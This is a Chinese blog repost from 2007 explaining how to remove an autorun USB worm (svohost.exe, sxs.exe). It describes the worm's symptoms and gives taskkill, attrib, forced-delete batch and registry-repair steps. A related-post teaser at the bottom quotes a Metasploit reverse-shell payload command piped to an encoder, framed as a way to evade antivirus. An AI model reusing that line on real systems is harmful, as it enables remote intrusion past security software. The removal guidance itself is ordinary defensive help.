无法显示 隐藏文件 无法启动 杀毒软件 svohost.exe CheckedValue Dword

转载 2007年09月28日 08:19:00

无法显示 隐藏文件 无法启动 杀毒软件 svohost.exe  CheckedValue Dword 

u盘带毒 exe文件关联 exe文件打不开

可能出现的症状:

1 .无法查看隐藏的文件;(在文件夹里选择查看所有文件和文件夹无反应)
2. 自动终止反病毒软件,金山和卡巴斯基(开机自动运行反病毒软件时软件自己报错,自行启动软件无反应);硬盘盘符双击无法打开,只能右键快捷方式选择打开才行!而且只要双击,系统进程里马上自动运行"SVOHOST.EXE"后来我在"超级兔子","自动运行"选项里看到了这个"SVOHOST.EXE"路径为:WINDOWS/system32/SVOHOST.EXE,但是在文件夹system32下却搜索不到它,(查找选项里已经勾选了"搜索系统和隐藏文件")后来直接在兔子里把这个文件删除,目前双击可以访问,但是还是无法查看隐藏文件,把反病毒软件卸载重装,开机依然是无法自动运行,手动运行软件报错~~~
3. 更糟糕的是重装了系统问题依旧,进程里还是有那个"SVOHOST.EXE"无法查看隐藏文件,硬盘盘符双击无法打开,后来我把这块儿染毒的硬盘设成从盘,把数据往另一块主盘里拷贝,不料刚开机器便染毒,自行终止了主盘上的金山毒霸(原来染毒的硬盘安装的是卡巴斯基),无法查看隐藏文件,硬盘盘符双击无法打开,只能右键快捷方式选择打开才行!进程里亦有一个"SVOHOST.EXE。。

4病毒将IE的首页修改为“http://www. ***iex.com”(有的不修改),使用户每次打开IE都会浏览该病毒网站。该病毒会造成多种杀毒软件和常用软件无法使用,还会从“http://mp3.***o.com/228.exe”网站下载病毒文件并运行(用户有时不会觉察). 

5.修改IE主页的默认地址   

HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain子建下的"Start Page"项为"http://www.joyiex.com" (也有不修改)

6.可能有些变种会自动关闭包含以下字符串的窗体:

  “杀毒”“注册表”“系统配置实用程序”“QQKav”“天网”“密码防盗”“绿鹰PC”“防火墙”“进程”“网镖”“任务管理器”“超级兔子”“优化大师”“木马克星”“QQAV”“毒霸”“黄山IE”“腾讯公司QQ”“QQ病毒”“xleo”“whboy”“Windows 任务管理器”“ThunderRT6formDC” 等

7.自动向QQ好友发送内容为“让我成功申请x位QQ号和Q币动画,朋友推荐我的,你看看http: //www.***iex.com/abc.exe”等的消息

8.exe文件都不能打开,记事本也不能打开了。

 


解决方法:

一、杀掉svohost.exe

看看是否有svohost.exe的进程,若有的话

1,  结束SVOHOST.EXE的进程。(如果打不开任务管理器和注册表编辑器的话必须这么做,能直接打开任务管理器然后结束它更好)能直接打开任务管理器和注册表的话直接到第2步。

(1).开始菜单-运行-输入CMD命令打开CMD窗口;输入命令tasklist回车查看一下..果然发现了这个进程:svohost.exe(虽然他禁用了任务管理器,但在CMD下用tasklist命令还是可以查看到进程信息的)
   (2).关了他.输入命令taskkill /f /im svohost.exe (请严格按照此格式输入命令包括空格,否则提示命令参数错误) 回车   提示svohost.exe结束成功.
    (3).搜索svohost.exe这个文件(把搜索高级选项里的"搜索隐藏的文件和文件夹"勾上,不选择此项是搜不到的)搜索到后删除!操作到这里大家可以打开注册表和任务管理器了


2、我的电脑,工具>>文件加选项>>查看>>把“隐藏受保护的操作系统文件(推荐)”之前的钩钩取掉。


3、右击C盘(假设windows系统安装在C盘)>>打开,然后到C:/WINDOWS/system32/下找到SVOHOST.EXE删除掉,搜索其他盘的svohost.exe(把搜索高级选项里的"搜索隐藏的文件和文件夹"勾上,不选择此项是搜不到的)


4、开始>>运行msconfig>>启动>>把SVOHOST.EXE的启动项取消,打开注册表,按F3,搜索svohost.exe和sxs.exe,找到后全部删掉(很有可能在这里:HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run
,找到 SoundMam 或者rose项,各个病毒不一样,所以只要有可疑的,就删)


5、删除sxs.exe和autorun.inf

     简单的方法:在分区盘上单击鼠标右键——打开,看到每个盘跟目录下有 autorun.inf 和 sxs.exe 两个文件,将其删除,前提是你已经显示了隐藏文件。

     { 复杂的方法1:(不嫌麻烦可以这么做

开始>>运行cmd>>用dir /a的命令检查所有盘符下有没有sxs.exe和autorun.inf两个文件,格式如下:

attrib -h -r -s 盘符:/sxs.exe
del 盘符:/sxs.exe
attrib -h -s -r 盘符:/autorun.inf
del 盘符:/autorun.inf
所有的盘符依次写一遍。

有的话,用下面的方法全部删除:
    取消这两个文件的隐藏属性
        输入attrib -a -s -h -r sxs.exe命令执行
        再输入attrib -a -s -h -r autorun.inf命令执行
    把这两个文件分别删除  
        输入del sxs.exe和del autorun.inf)}

{复杂的方法2:

打开一个记事本,将以下代码拷进去,另存为bat格式 :
cd
c:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf
D:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf
E:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf
F:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf
G:
attrib sxs.exe -a -h -s
del /s /q /f sxs.exe
attrib autorun.inf -a -h -s
del /s /q /f autorun.inf

运行}


6、最后一步,(这一步不一定每个人都要做,因为病毒有变种,但是最好做一下)开始>>运行regedit>>找到注册表HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/MountPoints2目录下的{e94c3812-d758-11da-8647-806d6172696f}、{e94c3813-d758-11da-8647-806d6172696f}等的表信息,删除即可。现在杀毒软件应该可以运行了。


二、让隐藏文件显示这一项生效:

开始--运行,输入 regedit,回车,展开HKEY_LOCAL_MACHINE/Software/Microsoft/windows/CurrentVersion/explorer/Advanced/Folder/Hidden/SHOWALL中的CheckedValue,检查它的类型是否为REG_DWORD,如果不是则删掉CheckedValue,然后单击右键“新建”--〉“Dword值”,并命名为CheckedValue,然后修改它的键值为1。
(最近很多电脑中了橙色八月病毒,该病毒修改注册表,导致不能看到隐藏文件,并且使杀毒软件不能启动!)

三、u盘的杀毒(也不是必须要做,你就留着毒盘去毒mm,然后去帮她解决问题,说不定。。。。)

插入u盘,直到电脑提示“新硬件可以使用”,打开我的电脑,这时在U盘的图标上点鼠标右键 选择“打开” (不要点自动播放或者是双击!),删除 SXS.exe和autorun.inf文件 病毒就没有了。

四、exe文件打不开的解决方法

首先:在注册表下的HKEY_LOCAL_MACHINE/Software/Microsoft/windowsNT/currentVersion/winlogon
下面有个名为shell的子项,键值应为explorer.exe,检查下

然后按以下方法执行

方法 1: 适用于所用 Windows 95 以上版本的 Windows (9x/ME/2000/XP/2003)

开始->运行->输入"command" (在
Windows 2000/XP/2003 中,输入"cmd"),回车

在命令行中,依次执行以下命令:

cd %windir%
copy regedit.exe regedit.com
regedit

注册表编辑器打开后,找到以下分支:

HKEY_CLASSES_ROOT/exefile/shell/open/command

双击右侧窗口中的 (默认) 值,设置为 "%1" %* [包含引号]

再找到:

HKEY_CLASSES_ROOT/.exe


双击右侧窗口中的 (默认) 值,设置为 exefile
然后退出
注册表编辑器,重启电脑

方法 2: 适用于
Windows 2000/XP/2003

开始->运行->输入"cmd",回车

在命令行中,依次执行以下命令:

ftype exefile="%1" %*   [包含引号]
assoc .exe=exefile

重启电脑

方法 3: 适用于 Windows 2000/XP/2003

下载并运行以下任一 .reg 文件

点我下载

你可以通过这个链接引用该篇文章:http://sanli668.bokee.com/tb.b?diaryId=14371532  

杀毒软件的查杀病毒的原理以及木马、病毒的免杀伎俩(论杀或者不杀 )

无意中在网上看到的,描述通俗易懂,基本全是基础知识,权当了解吧。 ================================================================...
  • xuewater
  • xuewater
  • 2013年11月04日 10:44
  • 1202

有关lpk.dll病毒的清除方法

lpk.dll病毒是常见的病毒,感染之后很难清除,它会在整个系统中到处放置他的副本,同时有多种方式相互照应,必须全部清除才能清理干净。 以下为我试过的大致的清理步骤: 1. 打开我的电脑,在工具,文件...
  • pendle
  • pendle
  • 2013年12月10日 00:16
  • 29284

在WinServer上安装小红伞杀毒软件的经验总结

作者:朱金灿来源:http://blog.csdn.net/clever101            在WinServer2008或WinServer2012不能直接安装小红伞杀毒软件的免费版,需要安...
  • clever101
  • clever101
  • 2016年08月30日 18:39
  • 3626

痛心:《万能数据库查询分析器》采用EXE文件加壳技术,导致被杀毒软件误杀

本来想防止别人使用DEBUG工具来破解《万能数据库查询分析器》,来更好地保护自己的知识产权,所以《万能数据库查询分析器》中英文版本《DB 查询分析器》、《DB Query Analyzer》均采用了E...
  • magenfeng
  • magenfeng
  • 2011年11月29日 11:15
  • 1223

NOD32杀毒软件引起默认域策略无法应用到客户端一案

近期用户反映在输入密码后,电脑显示“正在应用个人设置”或者“正在应用计算机设置”时会停留很长时间,检查其电脑的日志发现,在应用程序的日志里反复出现事件ID为1030和1058的事件,描述内容为某个组策...
  • windowsxpwyd
  • windowsxpwyd
  • 2011年09月21日 08:52
  • 1880

回收站的文件被杀毒软件清空了怎么办

回收站的文件被杀毒软件清空了怎么办 昨天用u盘的时候发现有点不对头,网页也经常会自动的跳到一个游戏的页面,所以我一直怀疑我的电脑中毒了,可能是因为很久没有杀毒,连最基本的体检都没有弄的缘故吧!所...
  • wanan0201
  • wanan0201
  • 2014年05月28日 16:35
  • 309

【每日安全资讯】卡巴斯基杀毒软件可成为强大的间谍工具,搜索机密文件

自从美国政府封杀卡巴斯基杀毒软件之后,双方也进行了多次拉锯战。前段时间卡巴斯基已经正式提起上诉,而近期前NSA黑客证实,卡巴斯基杀软可以成为一种强大的间谍工具。详细事件发展可查看回顾:卡巴斯基关于勒索...
  • F8qG7f9YD02Pe
  • F8qG7f9YD02Pe
  • 2018年01月05日 00:00
  • 41

回收站被杀毒软件清理还能恢复文件吗

回收站被杀毒软件清理还能恢复文件吗 王先生是一名设计师,平时在工作中使用的文件有很多。所以王先生总会定期清理不要的文件,但是因为一次操作失误,他误删了一个文件,但是由于急着开会,一时没有还原。等他开...
  • wanan0201
  • wanan0201
  • 2014年05月22日 17:13
  • 547

metasploit启动远程shell而不被杀毒软件发现

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e...
  • feier7501
  • feier7501
  • 2013年04月29日 22:36
  • 1631

一个小程序,打开前需关闭杀毒软件,否则无法打开

  • 2014年06月13日 07:40
  • 61KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:无法显示 隐藏文件 无法启动 杀毒软件 svohost.exe CheckedValue Dword
举报原因:
原因补充:

(最多只允许输入30个字)